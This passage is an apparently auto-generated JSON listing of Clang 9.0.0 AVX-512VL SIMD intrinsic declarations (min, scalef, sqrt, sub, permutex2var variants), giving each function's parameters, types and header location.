"__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_maskz_min_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3226:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_min_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3233:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_min_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3240:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_min_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3247:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_min_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3254:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_min_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3259:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_min_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3266:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_min_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3273:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_min_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3278:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_min_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3285:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_scalef_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3366:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask_scalef_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3375:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_scalef_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3384:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_scalef_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3393:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_mask_scalef_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3402:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_scalef_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3411:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_scalef_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3420:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_scalef_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3429:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_scalef_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3437:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_scalef_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3446:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_mask_scalef_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3455:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_scalef_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3464:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_sqrt_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3633:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_sqrt_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3640:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_sqrt_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3647:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_sqrt_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3654:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_sqrt_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3661:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_sqrt_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3668:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_sqrt_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3675:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_sqrt_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3682:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_sub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3689:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_sub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3696:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_sub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3703:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_sub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3710:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_sub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3717:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_sub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3724:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_sub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3731:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_sub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3738:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_permutex2var_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3745:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_permutex2var_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3751:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask2_permutex2var_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3759:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_permutex2var_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3767:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_permutex2var_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3775:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_permutex2var_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3781:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask2_permutex2var_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3789:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_permutex2var_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3797:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_permutex2var_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3805:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask_permutex2var_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3811:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask2_permutex2var_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3818:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_permutex2var_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3825:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_permutex2var_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3832:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_mask_permutex2var_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3838:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_mask2_permutex2var_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3846:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_permutex2var_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3854:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_permutex2var_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3862:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_permutex2var_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3868:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask2_permutex2var_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3875:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_permutex2var_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3882:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_permutex2var_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3889:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_mask_permutex2var_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3895:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_mask2_permutex2var_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3902:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_permutex2var_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3910:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_permutex2var_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3918:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_permutex2var_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3924:3", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__I", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask2_permutex2var_epi64", "ns": 0, "location": 